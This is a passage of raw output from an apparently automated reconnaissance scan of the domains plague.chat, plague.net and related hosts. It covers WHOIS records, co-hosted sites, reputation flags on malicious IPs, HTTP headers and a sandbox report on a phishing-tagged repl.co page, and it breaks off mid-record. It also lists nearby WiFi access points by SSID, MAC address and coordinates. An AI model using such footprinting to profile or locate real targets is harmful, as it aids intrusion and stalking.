Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns1.dyna-ns.net Name Server: ns2.dyna-ns.net DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain Name: PLAGUE.CHAT Registry Domain ID: 7664ba56bd064bbf82bc4fb158862a02-DONUTS Registrar WHOIS Server: whois.dynadot.com Registrar URL: http://www.dynadot.com Updated Date: 2022-01-03T14:24:39.0Z Creation Date: 2020-01-31T13:24:11.0Z Registrar Registration Expiration Date: 2023-01-31T13:24:11.0Z Registrar: DYNADOT LLC Registrar IANA ID: 472 Registrar Abuse Contact Email: abuse@dynadot.com Registrar Abuse Contact Phone: +1.6502620100 Domain Status: clientTransferProhibited Registry Registrant ID: CPF-103775 Registrant Name: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Phone: REDACTED FOR PRIVACY Registrant Email: https://www.dynadot.com/domain/contact-request?domain=plague.chat Registry Admin ID: CPF-103775 Admin Name: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Phone: REDACTED FOR PRIVACY Admin Email: https://www.dynadot.com/domain/contact-request?domain=plague.chat Registry Tech ID: CPF-103775 Tech Name: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Phone: REDACTED FOR PRIVACY Tech Email: https://www.dynadot.com/domain/contact-request?domain=plague.chat Name Server: ns1.dyna-ns.net Name Server: ns2.dyna-ns.net DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-01-03 06:24:39 -0800 <<< 2022-12-18 00:25:13 Malicious IP Address Yes MetaDefender 0 0 1 0 None webroot.com [20.224.2.213] 20.224.2.213 2022-12-18 00:04:49 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.biz plague.fun 2022-12-18 00:24:07 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse-contact@publicdomainregistry.com Domain Name: PLAGUE.NET Registry Domain ID: 33118110_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.PublicDomainRegistry.com Registrar URL: http://www.publicdomainregistry.com Updated Date: 2022-09-03T19:07:29Z Creation Date: 2000-08-17T10:30:29Z Registry Expiry Date: 2023-08-17T10:30:29Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com Registrar Abuse Contact Phone: +1.2013775952 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Name Server: BIZ.THOROFARE.INFO Name Server: INFO.THOROFARE.BIZ DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:23:45Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: PLAGUE.NET Registry Domain ID: 33118110_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.publicdomainregistry.com Registrar URL: www.publicdomainregistry.com Updated Date: 2022-09-03T19:07:30Z Creation Date: 2000-08-17T10:30:29Z Registrar Registration Expiration Date: 2023-08-17T10:30:29Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: GDPR Masked Registrant Name: GDPR Masked Registrant Organization: GDPR Masked Registrant Street: GDPR Masked Registrant City: GDPR Masked Registrant State/Province: London Registrant Postal Code: GDPR Masked Registrant Country: GB Registrant Phone: GDPR Masked Registrant Phone Ext: Registrant Fax: GDPR Masked Registrant Fax Ext: Registrant Email: gdpr-masking@gdpr-masked.com Registry Admin ID: GDPR Masked Admin Name: GDPR Masked Admin Organization: GDPR Masked Admin Street: GDPR Masked Admin City: GDPR Masked Admin State/Province: GDPR Masked Admin Postal Code: GDPR Masked Admin Country: GDPR Masked Admin Phone: GDPR Masked Admin Phone Ext: Admin Fax: GDPR Masked Admin Fax Ext: Admin Email: gdpr-masking@gdpr-masked.com Registry Tech ID: GDPR Masked Tech Name: GDPR Masked Tech Organization: GDPR Masked Tech Street: GDPR Masked Tech City: GDPR Masked Tech State/Province: GDPR Masked Tech Postal Code: GDPR Masked Tech Country: GDPR Masked Tech Phone: GDPR Masked Tech Phone Ext: Tech Fax: GDPR Masked Tech Fax Ext: Tech Email: gdpr-masking@gdpr-masked.com Name Server: biz.thorofare.info Name Server: info.thorofare.biz DNSSEC: Unsigned Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com Registrar Abuse Contact Phone: +1.2013775952 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:24:02Z <<< For more information on Whois status codes, please visit https://icann.org/epp Registration Service Provided By: The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is", and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. The Registrar of record is PDR Ltd. d/b/a PublicDomainRegistry.com. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. 2022-12-18 00:04:30 Affiliate - Internet Name No DNS Raw Records 1 0 1 0 None ns1.amenworld.com zerotwo-best-waifu.online 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None denis (Net ID: 00:01:46:02:C4:4C) 37.780462,-122.390564 2022-12-18 00:25:41 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None lfbn-nic-1-313-189.w90-116.abo.wanadoo.fr 90.116.149.189 2022-12-18 00:22:28 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.128:443 188.114.97.0/24 2022-12-18 00:09:38 Co-Hosted Site No HackerTarget 0 0 2 0 None 1sygo.com.cdn.cloudflare.net 172.67.147.230 2022-12-18 00:32:59 Malicious Affiliate IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [81.88.52.225] https://www.virustotal.com/en/ip-address/81.88.52.225/information/ 81.88.52.225 2022-12-18 00:21:02 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77af8d20cabc9b1f-FRA Content-Encoding: gzip 104.21.28.240 2022-12-18 00:04:04 Raw Data from RIRs No Tool - WhatWeb 0 0 1 0 None [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://rasputain.fr', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://rasputain.fr/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.67.169.215']}}}, {}] rasputain.fr 2022-12-18 00:13:35 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None noc@cloudflare.com {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'neutral', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2021-03-04 12:44:22', u'asn_date': u'2015-02-25 00:00:00', u'tag': [u'phishing'], u'postal_code': u'20500', u'is_mining_pool': False, u'ip_addr': u'172.67.190.129', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'Washington', u'last_updated': u'2017-02-17 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 38.9071923, u'lon': -77.0368707}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'description': u'Phishing', u'labels': [u'compromised'], u'source': u'Maltiverse', u'first_seen': u'2021-03-04 12:44:22', u'last_seen': u'2021-03-04 12:44:22'}], u'modification_time': u'2021-03-04 12:44:22', u'asn_cidr': u'172.67.176.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': False, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None charmingsinfulbusinesses.distingindouser.repl.co 34.149.204.188 2022-12-18 00:09:43 Co-Hosted Site No HackerTarget 0 0 2 0 None alejandrocastillero.com.pa 172.67.147.230 2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.169.215 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b0cd833b792c30-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.1 2022-12-18 00:25:19 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [104.21.28.240] 104.21.28.240 2022-12-18 00:34:23 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.dynv6.net plague.fun 2022-12-18 00:03:05 IPv6 Address No DNS Resolver 2 0 1 0 None 2606:4700:3035::6815:1bf2 rasputain.fr 2022-12-18 00:13:56 HTTP Status Code No Web Spider 0 0 2 0 None None http://wasp.plague.fun 2022-12-18 00:06:31 Company Name No Company Name Extractor 0 0 2 0 None ENOM, INC. Domain Name: ZEROTWO-BEST-WAIFU.ONLINE Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-01-11T15:03:40.0Z Creation Date: 2021-12-25T22:42:25.0Z Registry Expiry Date: 2022-12-25T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: zerotwo-best-waifu.online Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-01-11T15:03:40.00Z Creation Date: 2021-12-25T22:42:00.00Z Registrar Registration Expiration Date: 2022-12-25T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: ok https://www.icann.org/epp#ok Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Paris Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/0b66922f-87a6-44e9-a979-1158d3dacd13 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTP://WDPRS.INTERNIC.NET/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None fse2 (Net ID: 00:01:38:A0:A1:09) 37.780462,-122.390564 2022-12-18 00:15:47 Non-Standard HTTP Header No Strange Header Identifier 0 0 3 0 None keep-alive: timeout=5 {"content-length": "1078", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Thu, 03 Nov 2022 03:05:34 GMT", "connection": "keep-alive", "etag": "W/\"436-1843b737830\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:17 GMT", "access-control-allow-origin": "*", "content-type": "text/html; charset=UTF-8"} 2022-12-18 00:24:56 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.176 90.116.149.183 2022-12-18 00:03:09 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.226 81.88.52.232 2022-12-18 00:03:03 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.105 90.116.166.104 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None #LG@Vo1P*Service& (Net ID: 00:01:36:57:A4:17) 37.780462,-122.390564 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.137.37 2022-12-18 00:13:38 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None info@indiantypefoundry.com [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://0006352.841600.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"0006352.841600.repl.co"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3252"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IE_EarlyTabStart_0xaec_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_ConnHashTable<3252>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cb4_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_cb4_IESQMMUTEX_0_519"\n "IsoScope_cb4_ConnHashTable<3252>_HashTable_Mutex"\n "IsoScope_cb4_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_cb4_IE_EarlyTabStart_0xaec_Mutex"'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /css/util.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /css/util.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /fonts/iconic/css/material-design-iconic-font.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /fonts/iconic/css/material-design-iconic-font.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /css/main.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /css/main.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /fonts/poppins/Poppins-Medium.ttf HTTP/1.1\nAccept: */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://0006352.841600.repl.co\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /fonts/poppins/Poppins-Medium.ttf HTTP/1.1\nAccept: */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://0006352.841600.repl.co\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /images/fond.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /images/fond.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /fonts/poppins/Poppins-Regular.ttf HTTP/1.1\nAccept: */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://0006352.841600.repl.co\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /fonts/poppins/Poppins-Regular.ttf HTTP/1.1\nAccept: */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://0006352.841600.repl.co\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /fonts/iconic/fonts/Material-Design-Iconic-Font.woff?v=2.2.0 